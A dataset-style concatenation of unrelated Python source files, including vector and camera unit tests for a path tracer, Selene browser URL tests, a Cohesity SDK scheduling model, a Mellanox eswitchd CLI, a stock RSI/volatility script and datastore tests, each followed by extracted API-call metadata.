'topic_param': topic_param, 'dT_in_seconds':\n self.dT_in_seconds, 'type': 'pv'})\n", (8665, 8842), False, 'import json\n'), ((9114, 9276), 'prediction.prediction.Prediction', 'Prediction', (['config', 'self.control_frequency', 'self.horizon_in_steps', 'pv_lstm_name', 'topic_param', 'self.dT_in_seconds', 'self.id', 'output_config', '"""pv"""', 'opt_values'], {}), "(config, self.control_frequency, self.horizon_in_steps,\n pv_lstm_name, topic_param, self.dT_in_seconds, self.id, output_config,\n 'pv', opt_values)\n", (9124, 9276), False, 'from prediction.prediction import Prediction\n'), ((10014, 10176), 'prediction.pvPrediction.PVPrediction', 'PVPrediction', (['config', 'output_config', 'input_config_parser', 'self.id', 'self.control_frequency', 'self.horizon_in_steps', 'self.dT_in_seconds', 'non_prediction_name'], {}), '(config, output_config, input_config_parser, self.id, self.\n control_frequency, self.horizon_in_steps, self.dT_in_seconds,\n non_prediction_name)\n', (10026, 10176), False, 'from prediction.pvPrediction import PVPrediction\n'), ((11726, 11975), 'optimization.controllerStochasticTestMulti.OptControllerStochastic', 'OptControllerStochastic', (['self.id', 'self.solver_name', 'self.model_path', 'self.control_frequency', 'self.repetition', 'output_config', 'input_config_parser', 'config', 'self.horizon_in_steps', 'self.dT_in_seconds', 'self.optimization_type', 'self.single_ev'], {}), '(self.id, self.solver_name, self.model_path, self.\n control_frequency, self.repetition, output_config, input_config_parser,\n config, self.horizon_in_steps, self.dT_in_seconds, self.\n optimization_type, self.single_ev)\n', (11749, 11975), False, 'from optimization.controllerStochasticTestMulti import OptControllerStochastic\n')] |
xann16/py-path-tracing | ptrace/oop/math_tests.py | 609dbe6b80580212bd9d8e93afb6902091040d7a | """Unit tests for math-oriented common classes."""
import unittest
import math
import numpy as np
from .vector import Vec3, OrthonormalBasis
from .raycast_base import Ray
from .camera import Camera
class Vec3Tests(unittest.TestCase):
"""Test for Vec3 class."""
def test_vec3_basic(self):
"""Basic creation, access and manipulation of vector components."""
zero = Vec3()
vvv = Vec3(1, 2, 3)
x_arr = np.array([.1, .2, .3], dtype='double')
xxx = Vec3.from_array(x_arr)
ones = Vec3.full(1.0)
i_hat = Vec3.versor(0)
self.assertEqual(zero[0], 0.0)
self.assertEqual(zero[1], 0.0)
self.assertEqual(zero[2], 0.0)
self.assertEqual(vvv[0], 1.0)
self.assertEqual(vvv[1], 2.0)
self.assertEqual(vvv[2], 3.0)
vvv[2] = 10
self.assertEqual(vvv[2], 10.0)
self.assertEqual(str(vvv), '[ 1. 2. 10.]')
self.assertEqual(xxx[0], .1)
self.assertEqual(xxx[1], .2)
self.assertEqual(xxx[2], .3)
self.assertEqual(ones[0], 1)
self.assertEqual(ones[1], 1)
self.assertEqual(ones[2], 1)
self.assertEqual(i_hat[0], 1)
self.assertEqual(i_hat[1], 0)
self.assertEqual(i_hat[2], 0)
is_v_eq = np.allclose(vvv.data(), np.array([1, 2, 10]))
self.assertEqual(is_v_eq, True)
is_x_eq = np.allclose(xxx.data(), x_arr)
self.assertEqual(is_x_eq, True)
self.assertEqual(vvv.copy(), vvv)
def test_vec3_arithmetic_and_comparisons(self):
"""Testing methods and operators used for arithmentic and comparisons.
"""
xxx = Vec3(1, 2, 3)
yyy = Vec3(1, 2, 3)
zzz = Vec3(1, 0, -1)
self.assertEqual(xxx == yyy, True)
self.assertEqual(xxx != yyy, False)
self.assertEqual(xxx != zzz, True)
self.assertEqual(xxx == zzz, False)
self.assertEqual(yyy != zzz, True)
self.assertEqual(yyy == zzz, False)
yyy += zzz
self.assertEqual(yyy, Vec3.full(2))
self.assertEqual(yyy + xxx, Vec3(3, 4, 5))
yyy -= zzz
self.assertEqual(yyy, xxx)
self.assertEqual(yyy - xxx, Vec3())
self.assertEqual(+xxx, xxx)
self.assertEqual(-xxx, Vec3(-1, -2, -3))
yyy *= -1
self.assertEqual(yyy, -xxx)
self.assertEqual(yyy * -1.0, xxx)
zzz /= 2
self.assertEqual(zzz, Vec3(.5, 0, -.5))
self.assertEqual(zzz / 2, Vec3(.25, 0, -.25))
vvv = Vec3(3, 1, -2)
vvv *= Vec3(2, .5, -1)
self.assertEqual(vvv, Vec3(6, .5, 2))
self.assertEqual(vvv * Vec3.full(2), Vec3(12, 1, 4))
www = Vec3.full(10)
www /= Vec3(10, 5, 2)
self.assertEqual(www, Vec3(1, 2, 5))
self.assertEqual(www / 2, Vec3(.5, 1, 2.5))
self.assertAlmostEqual(www.dot(Vec3()), 0)
self.assertAlmostEqual(Vec3(1, 2, 4).dot(Vec3(1, -2, 1)), 1)
self.assertEqual(Vec3.versor(0).cross(Vec3.versor(1)), Vec3.versor(2))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(2)), Vec3.versor(0))
self.assertEqual(Vec3.versor(2).cross(Vec3.versor(0)), Vec3.versor(1))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(0)), -Vec3.versor(2))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(1)), Vec3())
self.assertEqual(Vec3(1, 2, 3).isclose(Vec3(1, 2, 3)), True)
self.assertEqual(Vec3(1, 2, 3).isclose(Vec3(1, 2.0001, 3), 0.1), True)
def test_vec3_normalization(self):
"""Testing length calculations and normalisation."""
self.assertAlmostEqual(Vec3().sqr_length(), 0.0)
self.assertAlmostEqual(Vec3().length(), 0.0)
self.assertAlmostEqual(Vec3.versor(0).sqr_length(), 1.0)
self.assertAlmostEqual(Vec3.versor(1).length(), 1.0)
self.assertAlmostEqual(abs(Vec3.versor(2)), 1.0)
self.assertEqual(Vec3.versor(0).normalised(), Vec3.versor(0))
self.assertEqual(Vec3.versor(1).normalised(), Vec3.versor(1))
self.assertEqual(Vec3.versor(2).normalised(), Vec3.versor(2))
sqrt3 = math.sqrt(3)
v_sqrt3_inv = Vec3.full(1. / sqrt3)
self.assertAlmostEqual(Vec3.full(1).sqr_length(), 3)
self.assertAlmostEqual(Vec3.full(1).length(), sqrt3)
self.assertEqual(Vec3.full(1).normalised(), v_sqrt3_inv)
def test_vec3_reflection(self):
"""Testing reflection with respect to given normal vector."""
nnn = Vec3.versor(2)
self.assertEqual(nnn.reflect(Vec3.versor(0)), Vec3.versor(0))
self.assertEqual(nnn.reflect(Vec3.versor(2)), -Vec3.versor(2))
diag = Vec3(1, 1, 1).normalised()
diag_refl = diag.copy()
diag_refl[2] = -diag_refl[2]
self.assertEqual(nnn.reflect(diag), diag_refl)
class OrthonormalBasisTests(unittest.TestCase):
"""Tests for OrthonormalBasis class."""
def test_onb_basic(self):
"""Basic test reconstructing natural ONB."""
nat = OrthonormalBasis(Vec3.versor(0), Vec3.versor(1), Vec3.versor(2))
nat_alt = OrthonormalBasis.from_two('xy', Vec3.versor(0), Vec3.versor(1))
vvv = Vec3(1, 2, 3)
self.assertEqual(nat.transform(vvv), vvv)
self.assertEqual(nat_alt.transform(vvv), vvv)
def test_onb_factories(self):
"""Testing factory methods for creating ONBs from one or two vectors."""
onb1 = OrthonormalBasis.from_two('xy', Vec3(1, 2, 4).normalised(),\
Vec3(0, 0, -7).normalised())
self.assertAlmostEqual(abs(onb1.x_axis), 1.0)
self.assertAlmostEqual(abs(onb1.y_axis), 1.0)
self.assertAlmostEqual(abs(onb1.z_axis), 1.0)
self.assertAlmostEqual(onb1.x_axis.dot(onb1.y_axis), 0.0)
self.assertAlmostEqual(onb1.x_axis.dot(onb1.z_axis), 0.0)
self.assertAlmostEqual(onb1.y_axis.dot(onb1.z_axis), 0.0)
onb2 = OrthonormalBasis.from_two('zx', Vec3(-1, -1, -1).normalised(),\
Vec3(1, 1, -1).normalised())
self.assertAlmostEqual(abs(onb2.x_axis), 1.0)
self.assertAlmostEqual(abs(onb2.y_axis), 1.0)
self.assertAlmostEqual(abs(onb2.z_axis), 1.0)
self.assertAlmostEqual(onb2.x_axis.dot(onb2.y_axis), 0.0)
self.assertAlmostEqual(onb2.x_axis.dot(onb2.z_axis), 0.0)
self.assertAlmostEqual(onb2.y_axis.dot(onb2.z_axis), 0.0)
onb3 = OrthonormalBasis.from_z_axis(Vec3.versor(0))
self.assertAlmostEqual(abs(onb3.x_axis), 1.0)
self.assertAlmostEqual(abs(onb3.y_axis), 1.0)
self.assertAlmostEqual(abs(onb3.z_axis), 1.0)
self.assertAlmostEqual(onb3.x_axis.dot(onb3.y_axis), 0.0)
self.assertAlmostEqual(onb3.x_axis.dot(onb3.z_axis), 0.0)
self.assertAlmostEqual(onb3.y_axis.dot(onb3.z_axis), 0.0)
class RayTests(unittest.TestCase):
"""Tests for Ray class."""
def test_ray_basic(self):
"""Basic tests chcecking ray creation and probing their points."""
ox_axis = Ray(Vec3(), Vec3.versor(0))
self.assertEqual(ox_axis.point_at(4), Vec3(4, 0, 0))
direction = Vec3(1, -1, 0).normalised()
ray1 = Ray(Vec3(0, 2, 0), direction)
ray2 = Ray.from_points(Vec3(0, 2, 0), Vec3(2, 0, 0))
self.assertEqual(ray1.direction, direction)
self.assertEqual(ray2.direction, direction)
for i in range(10):
self.assertEqual(ray1.point_at(i), ray2.point_at(i))
self.assertEqual(ray1.point_at(0), ray1.origin)
self.assertEqual(ray2.point_at(0), ray2.origin)
class CameraTests(unittest.TestCase):
"""Tests for Camera class."""
def test_cam_basic(self):
"""Basic test checking if camera casts rays in correct direction."""
cam = Camera(Vec3(), Vec3.versor(0), Vec3.versor(2), 10, 10, 120)
cam.set_focus(Vec3.versor(0), 1.0)
for px_x in range(10):
for px_y in range(10):
ray = cam.get_ray(px_x, px_y)
self.assertGreaterEqual(ray.direction.dot(Vec3.versor(0)), 0.0)
if __name__ == '__main__':
unittest.main()
| [((8125, 8140), 'unittest.main', 'unittest.main', ([], {}), '()\n', (8138, 8140), False, 'import unittest\n'), ((443, 484), 'numpy.array', 'np.array', (['[0.1, 0.2, 0.3]'], {'dtype': '"""double"""'}), "([0.1, 0.2, 0.3], dtype='double')\n", (451, 484), True, 'import numpy as np\n'), ((4121, 4133), 'math.sqrt', 'math.sqrt', (['(3)'], {}), '(3)\n', (4130, 4133), False, 'import math\n'), ((1309, 1329), 'numpy.array', 'np.array', (['[1, 2, 10]'], {}), '([1, 2, 10])\n', (1317, 1329), True, 'import numpy as np\n')] |
kianku/selene | tests/integration/condition__browser__have_url_test.py | 5361938e4f34d6cfae6df3aeca80e06a3e657d8c | # MIT License
#
# Copyright (c) 2015-2020 Iakiv Kramarenko
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import pytest
from selene import have
from selene.core.exceptions import TimeoutException
start_page = 'file://' + os.path.abspath(os.path.dirname(__file__)) + '/../resources/start_page.html'
def test_have_url(session_browser):
session_browser.open(start_page)
session_browser.should(have.url(session_browser.driver.current_url))
session_browser.should(have.no.url(session_browser.driver.current_url[:-1]))
def test_have_url_containing(session_browser):
session_browser.open(start_page)
session_browser.should(have.url_containing('start_page.html'))
session_browser.should(have.no.url_containing('start_page.xhtml'))
def test_fails_on_timeout_during_waiting_for_exact_url(session_browser):
browser = session_browser.with_(timeout=0.1)
browser.open(start_page)
with pytest.raises(TimeoutException):
browser.should(have.url('xttp:/'))
# TODO: check message too
def test_fails_on_timeout_during_waiting_for_part_of_url(session_browser):
browser = session_browser.with_(timeout=0.1)
browser.open(start_page)
with pytest.raises(TimeoutException):
browser.should(have.url_containing('xttp:/'))
# TODO: check message too
| [((1424, 1468), 'selene.have.url', 'have.url', (['session_browser.driver.current_url'], {}), '(session_browser.driver.current_url)\n', (1432, 1468), False, 'from selene import have\n'), ((1497, 1549), 'selene.have.no.url', 'have.no.url', (['session_browser.driver.current_url[:-1]'], {}), '(session_browser.driver.current_url[:-1])\n', (1508, 1549), False, 'from selene import have\n'), ((1664, 1702), 'selene.have.url_containing', 'have.url_containing', (['"""start_page.html"""'], {}), "('start_page.html')\n", (1683, 1702), False, 'from selene import have\n'), ((1731, 1773), 'selene.have.no.url_containing', 'have.no.url_containing', (['"""start_page.xhtml"""'], {}), "('start_page.xhtml')\n", (1753, 1773), False, 'from selene import have\n'), ((1939, 1970), 'pytest.raises', 'pytest.raises', (['TimeoutException'], {}), '(TimeoutException)\n', (1952, 1970), False, 'import pytest\n'), ((2215, 2246), 'pytest.raises', 'pytest.raises', (['TimeoutException'], {}), '(TimeoutException)\n', (2228, 2246), False, 'import pytest\n'), ((1261, 1286), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1276, 1286), False, 'import os\n'), ((1995, 2013), 'selene.have.url', 'have.url', (['"""xttp:/"""'], {}), "('xttp:/')\n", (2003, 2013), False, 'from selene import have\n'), ((2271, 2300), 'selene.have.url_containing', 'have.url_containing', (['"""xttp:/"""'], {}), "('xttp:/')\n", (2290, 2300), False, 'from selene import have\n')] |
chandrashekar-cohesity/management-sdk-python | cohesity_management_sdk/models/scheduling_policy.py | 9e6ec99e8a288005804b808c4e9b19fd204e3a8b | # -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
import cohesity_management_sdk.models.continuous_schedule
import cohesity_management_sdk.models.daily_schedule
import cohesity_management_sdk.models.monthly_schedule
import cohesity_management_sdk.models.rpo_schedule
class SchedulingPolicy(object):
"""Implementation of the 'SchedulingPolicy' model.
Specifies settings that define a backup schedule for a Protection Job.
Attributes:
continuous_schedule (ContinuousSchedule): Specifies the time interval
between two Job Runs of a continuous backup schedule and any
blackout periods when new Job Runs should NOT be started. Set if
periodicity is kContinuous.
daily_schedule (DailySchedule): Specifies a daily or weekly backup
schedule. Set if periodicity is kDaily.
monthly_schedule (MonthlySchedule): Specifies a monthly backup
schedule. Set if periodicity is kMonthly.
periodicity (PeriodicityEnum): Specifies how often to start new Job
Runs of a Protection Job. 'kDaily' means new Job Runs start daily.
'kMonthly' means new Job Runs start monthly. 'kContinuous' means
new Job Runs repetitively start at the beginning of the specified
time interval (in hours or minutes). 'kContinuousRPO' means this
is an RPO schedule.
rpo_schedule (RpoSchedule): Specifies an RPO backup schedule. Set if
periodicity is kContinuousRPO.
"""
# Create a mapping from Model property names to API property names
_names = {
"continuous_schedule":'continuousSchedule',
"daily_schedule":'dailySchedule',
"monthly_schedule":'monthlySchedule',
"periodicity":'periodicity',
"rpo_schedule":'rpoSchedule'
}
def __init__(self,
continuous_schedule=None,
daily_schedule=None,
monthly_schedule=None,
periodicity=None,
rpo_schedule=None):
"""Constructor for the SchedulingPolicy class"""
# Initialize members of the class
self.continuous_schedule = continuous_schedule
self.daily_schedule = daily_schedule
self.monthly_schedule = monthly_schedule
self.periodicity = periodicity
self.rpo_schedule = rpo_schedule
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
continuous_schedule = cohesity_management_sdk.models.continuous_schedule.ContinuousSchedule.from_dictionary(dictionary.get('continuousSchedule')) if dictionary.get('continuousSchedule') else None
daily_schedule = cohesity_management_sdk.models.daily_schedule.DailySchedule.from_dictionary(dictionary.get('dailySchedule')) if dictionary.get('dailySchedule') else None
monthly_schedule = cohesity_management_sdk.models.monthly_schedule.MonthlySchedule.from_dictionary(dictionary.get('monthlySchedule')) if dictionary.get('monthlySchedule') else None
periodicity = dictionary.get('periodicity')
rpo_schedule = cohesity_management_sdk.models.rpo_schedule.RpoSchedule.from_dictionary(dictionary.get('rpoSchedule')) if dictionary.get('rpoSchedule') else None
# Return an object of this model
return cls(continuous_schedule,
daily_schedule,
monthly_schedule,
periodicity,
rpo_schedule)
| [] |
mail2nsrajesh/networking-mlnx | networking_mlnx/eswitchd/cli/ebrctl.py | 9051eac0c2bc6abf3c8790e01917e405dc479922 | #!/usr/bin/python
# Copyright 2013 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
from networking_mlnx.eswitchd.cli import conn_utils
from networking_mlnx.eswitchd.cli import exceptions
client = conn_utils.ConnUtil()
def parse():
"""Main method that manages supported CLI commands.
The actions that are supported throught the CLI are:
write-sys, del-port, allocate-port and add-port
Each action is matched with method that should handle it
e.g. write-sys action is matched with write_sys method
"""
parser = argparse.ArgumentParser(prog='ebrctl')
parser.add_argument('action', action='store_true')
parent_parser = argparse.ArgumentParser(add_help=False)
parent_parser.add_argument('vnic_mac')
parent_parser.add_argument('device_id')
parent_parser.add_argument('fabric')
parent_parser.add_argument('vnic_type')
subparsers = parser.add_subparsers()
parser_add_port = subparsers.add_parser('add-port',
parents=[parent_parser])
parser_add_port.add_argument('dev_name')
parser_add_port.set_defaults(func=add_port)
parser_add_port = subparsers.add_parser('allocate-port',
parents=[parent_parser])
parser_add_port.set_defaults(func=allocate_port)
parser_del_port = subparsers.add_parser('del-port')
parser_del_port.set_defaults(func=del_port)
parser_del_port.add_argument('fabric')
parser_del_port.add_argument('vnic_mac')
parser_write_sys = subparsers.add_parser('write-sys')
parser_write_sys.set_defaults(func=write_sys)
parser_write_sys.add_argument('path')
parser_write_sys.add_argument('value')
args = parser.parse_args()
args.func(args)
def allocate_port(args):
try:
dev = client.allocate_nic(args.vnic_mac, args.device_id,
args.fabric, args.vnic_type)
except exceptions.MlxException as e:
sys.stderr.write("Error in allocate command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def add_port(args):
try:
dev = client.plug_nic(args.vnic_mac, args.device_id, args.fabric,
args.vnic_type, args.dev_name)
except exceptions.MlxException as e:
sys.stderr.write("Error in add-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def del_port(args):
try:
client.deallocate_nic(args.vnic_mac, args.fabric)
except exceptions.MlxException as e:
sys.stderr.write("Error in del-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def write_sys(args):
try:
fd = open(args.path, 'w')
fd.write(args.value)
fd.close()
except Exception as e:
sys.stderr.write("Error in write-sys command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def main():
parse()
| [((752, 773), 'networking_mlnx.eswitchd.cli.conn_utils.ConnUtil', 'conn_utils.ConnUtil', ([], {}), '()\n', (771, 773), False, 'from networking_mlnx.eswitchd.cli import conn_utils\n'), ((1098, 1136), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'prog': '"""ebrctl"""'}), "(prog='ebrctl')\n", (1121, 1136), False, 'import argparse\n'), ((1213, 1252), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'add_help': '(False)'}), '(add_help=False)\n', (1236, 1252), False, 'import argparse\n'), ((2627, 2648), 'sys.stdout.write', 'sys.stdout.write', (['dev'], {}), '(dev)\n', (2643, 2648), False, 'import sys\n'), ((2653, 2664), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (2661, 2664), False, 'import sys\n'), ((2987, 3008), 'sys.stdout.write', 'sys.stdout.write', (['dev'], {}), '(dev)\n', (3003, 3008), False, 'import sys\n'), ((3013, 3024), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3021, 3024), False, 'import sys\n'), ((3269, 3280), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3277, 3280), False, 'import sys\n'), ((3537, 3548), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3545, 3548), False, 'import sys\n'), ((2521, 2566), 'sys.stderr.write', 'sys.stderr.write', (['"""Error in allocate command"""'], {}), "('Error in allocate command')\n", (2537, 2566), False, 'import sys\n'), ((2575, 2602), 'sys.stderr.write', 'sys.stderr.write', (['e.message'], {}), '(e.message)\n', (2591, 2602), False, 'import sys\n'), ((2611, 2622), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (2619, 2622), False, 'import sys\n'), ((2881, 2926), 'sys.stderr.write', 'sys.stderr.write', (['"""Error in add-port command"""'], {}), "('Error in add-port command')\n", (2897, 2926), False, 'import sys\n'), ((2935, 2962), 'sys.stderr.write', 'sys.stderr.write', (['e.message'], {}), '(e.message)\n', (2951, 2962), False, 'import sys\n'), ((2971, 2982), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (2979, 2982), False, 'import sys\n'), ((3163, 3208), 'sys.stderr.write', 'sys.stderr.write', (['"""Error in del-port command"""'], {}), "('Error in del-port command')\n", (3179, 3208), False, 'import sys\n'), ((3217, 3244), 'sys.stderr.write', 'sys.stderr.write', (['e.message'], {}), '(e.message)\n', (3233, 3244), False, 'import sys\n'), ((3253, 3264), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3261, 3264), False, 'import sys\n'), ((3430, 3476), 'sys.stderr.write', 'sys.stderr.write', (['"""Error in write-sys command"""'], {}), "('Error in write-sys command')\n", (3446, 3476), False, 'import sys\n'), ((3485, 3512), 'sys.stderr.write', 'sys.stderr.write', (['e.message'], {}), '(e.message)\n', (3501, 3512), False, 'import sys\n'), ((3521, 3532), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3529, 3532), False, 'import sys\n')] |
paskino/SuRVoS | survos/core/__init__.py | e01e784442e2e9f724826cdb70f3a50c034c6455 |
from .launcher import Launcher
from .model import DataModel
from .layers import LayerManager
from .labels import LabelManager
from .singleton import Singleton
| [] |
Chahat-M/FinanceLib | src/FinanceLib/analysis.py | 0428779220a97e7fe0ad35a50207b737059b9c86 | from typing import List, Union
import numpy as np
import pandas_datareader as pdr
import pandas as pd
import matplotlib.pyplot as plt
def rsi(symbol :str ,name :str, date :str) -> None :
"""
Calculates and visualises the Relative Stock Index on a Stock of the company.
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
name(str) : Name of the company
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
rsi('GOOG','Google','2020,01,01')
"""
ticker : str = pdr.get_data_yahoo(symbol, date)
delta : List[float] = ticker['Close'].diff()
up : int = delta.clip(lower=0)
down : int = -1*delta.clip(upper=0)
ema_up : Union[bool,float]= up.ewm(com=13, adjust=False).mean()
ema_down : Union[bool,float] = down.ewm(com=13, adjust=False).mean()
rs : float = ema_up/ema_down
ticker['RSI'] = 100 - (100/(1 + rs))
ticker : list = ticker.iloc[14:]
print(ticker)
fig, (ax1, ax2) = plt.subplots(2)
ax1.get_xaxis().set_visible(False)
fig.suptitle(name)
ticker['Close'].plot(ax=ax1)
ax1.set_ylabel('Price ($)')
ticker['RSI'].plot(ax=ax2)
ax2.set_ylim(0,100)
ax2.axhline(30, color='r', linestyle='--')
ax2.axhline(70, color='r', linestyle='--')
ax2.set_ylabel('RSI')
plt.show()
def volatility(symbol :str, date :str) ->None:
"""
Measures and visualizes the Volatility of a Stock by calculating the Average True Range(ATR)
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
volatility('GOOG','2020,01,01')
"""
data : str = pdr.get_data_yahoo(symbol,date)
data.head()
high_low : Union[int,float]= data['High'] - data['Low']
high_cp : List[float] = np.abs(data['High'] - data['Close'].shift())
low_cp : List[float]= np.abs(data['Low'] - data['Close'].shift())
df : List[str] = pd.concat([high_low, high_cp, low_cp], axis=1)
true_range : float= np.max(df, axis=1)
average_true_range : float= true_range.rolling(14).mean()
average_true_range
true_range.rolling(14).sum()/14
fig, ax = plt.subplots()
average_true_range.plot(ax=ax)
ax2 : Union[bool,float]= data['Close'].plot(ax=ax, secondary_y=True, alpha=.3)
ax.set_ylabel("ATR")
ax2.set_ylabel("Price")
plt.show() | [((620, 652), 'pandas_datareader.get_data_yahoo', 'pdr.get_data_yahoo', (['symbol', 'date'], {}), '(symbol, date)\n', (638, 652), True, 'import pandas_datareader as pdr\n'), ((1072, 1087), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)'], {}), '(2)\n', (1084, 1087), True, 'import matplotlib.pyplot as plt\n'), ((1394, 1404), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1402, 1404), True, 'import matplotlib.pyplot as plt\n'), ((1865, 1897), 'pandas_datareader.get_data_yahoo', 'pdr.get_data_yahoo', (['symbol', 'date'], {}), '(symbol, date)\n', (1883, 1897), True, 'import pandas_datareader as pdr\n'), ((2137, 2183), 'pandas.concat', 'pd.concat', (['[high_low, high_cp, low_cp]'], {'axis': '(1)'}), '([high_low, high_cp, low_cp], axis=1)\n', (2146, 2183), True, 'import pandas as pd\n'), ((2208, 2226), 'numpy.max', 'np.max', (['df'], {'axis': '(1)'}), '(df, axis=1)\n', (2214, 2226), True, 'import numpy as np\n'), ((2367, 2381), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (2379, 2381), True, 'import matplotlib.pyplot as plt\n'), ((2557, 2567), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2565, 2567), True, 'import matplotlib.pyplot as plt\n')] |
jbenet/datastore | datastore/core/test/test_basic.py | 6c0e9f39b844788ca21c5cf613c625a72fb20c20 |
import unittest
import logging
from ..basic import DictDatastore
from ..key import Key
from ..query import Query
class TestDatastore(unittest.TestCase):
def subtest_simple(self, stores, numelems=1000):
def checkLength(len):
try:
for sn in stores:
self.assertEqual(len(sn), numelems)
except TypeError, e:
pass
self.assertTrue(len(stores) > 0)
pkey = Key('/dfadasfdsafdas/')
checkLength(0)
# ensure removing non-existent keys is ok.
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertFalse(sn.contains(key))
sn.delete(key)
self.assertFalse(sn.contains(key))
checkLength(0)
# insert numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertFalse(sn.contains(key))
sn.put(key, value)
self.assertTrue(sn.contains(key))
self.assertEqual(sn.get(key), value)
# reassure they're all there.
checkLength(numelems)
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
self.assertEqual(sn.get(key), value)
checkLength(numelems)
k = pkey
n = int(numelems)
allitems = list(range(0, n))
def test_query(query, slice):
for sn in stores:
try:
contents = list(sn.query(Query(pkey)))
expected = contents[slice]
result = list(sn.query(query))
# make sure everything is there.
self.assertTrue(len(contents) == len(allitems),\
'%s == %s' % (str(contents), str(allitems)))
self.assertTrue(all([val in contents for val in allitems]))
self.assertTrue(len(result) == len(expected),\
'%s == %s' % (str(result), str(expected)))
self.assertTrue(all([val in result for val in expected]))
#TODO: should order be preserved?
# self.assertEqual(result, expected)
except NotImplementedError:
print 'WARNING: %s does not implement query.' % sn
test_query(Query(k), slice(0, n))
test_query(Query(k, limit=n), slice(0, n))
test_query(Query(k, limit=n/2), slice(0, n/2))
test_query(Query(k, offset=n/2), slice(n/2, n))
test_query(Query(k, offset=n/3, limit=n/3), slice(n/3, 2*(n/3)))
del k
del n
# change numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
sn.put(key, value + 1)
self.assertTrue(sn.contains(key))
self.assertNotEqual(value, sn.get(key))
self.assertEqual(value + 1, sn.get(key))
checkLength(numelems)
# remove numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
sn.delete(key)
self.assertFalse(sn.contains(key))
checkLength(0)
class TestNullDatastore(unittest.TestCase):
def test_null(self):
from ..basic import NullDatastore
s = NullDatastore()
for c in range(1, 20):
c = str(c)
k = Key(c)
self.assertFalse(s.contains(k))
self.assertEqual(s.get(k), None)
s.put(k, c)
self.assertFalse(s.contains(k))
self.assertEqual(s.get(k), None)
for item in s.query(Query(Key('/'))):
raise Exception('Should not have found anything.')
class TestDictionaryDatastore(TestDatastore):
def test_dictionary(self):
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
stores = [s1, s2, s3]
self.subtest_simple(stores)
class TestCacheShimDatastore(TestDatastore):
def test_simple(self):
from ..basic import CacheShimDatastore
from ..basic import NullDatastore
class NullMinusQueryDatastore(NullDatastore):
def query(self, query):
raise NotImplementedError
# make sure the cache is used
s1 = CacheShimDatastore(NullMinusQueryDatastore(), cache=DictDatastore())
# make sure the cache is not relief upon
s2 = CacheShimDatastore(DictDatastore(), cache=NullDatastore())
# make sure the cache works in tandem
s3 = CacheShimDatastore(DictDatastore(), cache=DictDatastore())
self.subtest_simple([s1, s2, s3])
class TestLoggingDatastore(TestDatastore):
def test_simple(self):
from ..basic import LoggingDatastore
class NullLogger(logging.getLoggerClass()):
def debug(self, *args, **kwargs): pass
def info(self, *args, **kwargs): pass
def warning(self, *args, **kwargs): pass
